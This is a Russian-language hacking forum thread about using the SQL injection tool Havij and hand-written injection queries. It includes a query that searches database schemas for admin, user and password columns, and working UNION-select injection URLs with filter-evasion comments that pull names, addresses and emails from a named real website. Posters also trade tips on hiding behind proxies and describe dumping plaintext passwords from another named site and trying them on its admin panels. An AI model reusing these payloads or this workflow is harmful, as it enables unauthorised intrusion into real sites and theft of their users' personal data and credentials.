Подскажите плиз есть такой софт по поиску sql в котором можно задавать слова для поиска названия таблиц, столбцов и т.д. Например осуществлять поиск по таким словам: admin, user, pass и выводить мне результаты. А то заколебывает искать пароли!(((( Ps Надеюсь внятно объяснил?))))
select concat_ws(0x2e, table_schema, table_name, column_name) from information_schema.columns where column_name like '%admin%' or column_name like '%user%' or column_name like '%pass%'
народ, такой вопрос, вытащил из хавиджи снифером скулю вида и не могу ее подогнать под rsaUnDumper[sql] 2.0, помогите, замаялся уже))
2 варианта твоей скули в нормальной интерпретации Code: http://www.sait.co.uk/news_full.php?id=9999'+/*!union+all+select+(select+concat(id,0x5e,name,0x5e,address,0x5e,postcode,0x5e,email)+from+`trakkerp_trakker`.users+limit+1,1),2,3,4,5,6,7,8,9,10,11,12,13,14*/+and+'x'='x Code: http://www.sait.co.uk/news_full.php?id=9999'/**//*!union/**/all/**/select/**/(select/**/concat(id,0x5e,name,0x5e,address,0x5e,postcode,0x5e,email)/**/from/**/`trakkerp_trakker`.users/**/limit/**/1,1),2,3,4,5,6,7,8,9,10,11,12,13,14*//**/and/**/'x'='x Теперь понагляднее
Недавно решал эту проблему. Успешно. Для страждущих: Заходим в свойства exe и ставим "Запускать в режиме совместимости с Windows XP SP2 или SP3" Далее - полёт нормальный.
где-то на форуме писали уже, что можно просто напротив Keyword поставить галку и в текст кейворд вписать 0000 (4 нуля), и ошибки больше не будет... мну помогло...
Кто запускал havij через сокс ? (Или все на впн'ах ?) Я ему вбиваю адрес в setting->proxy . Он отвечает not a valid http proxy :\ Т е он может работать только через http proxy ?
хм... выложенная здесь последняя версия 1.15 не может автоматом определить keyword в PostgreSQL, руками подставляю - запросы select version() выдает, таблицы и БД выдало, а вот дальше - не может прочесть колонки. 1.14 - определяет автоматом keyword но после - ------- DB Server: PostgreSQL Target Vulnerable Finding current data base Please register to activate! -------------------- Ни когда раньше с PostgreSQL не работал. Но ситуация странная. ща поищу больше инфы))) Версия походу стремная (1.15)
Зравствуйте вообщем нашел я SQL иньекцию http://www.toydorks.com/displayproduct.php?item=125587 дальше вставил ее в havij нашла имена, пароли, (не хэшированные сразу выдала нужные) дальше запустил программку admin finder нашло 3 админ панели вставил имя пароль во все админ панели пароль ни к одной не подошел??.. В чем проблема пожалуйста помогите! повторите все действия может быть тогда поймете в чем проблема... рад любому совету..
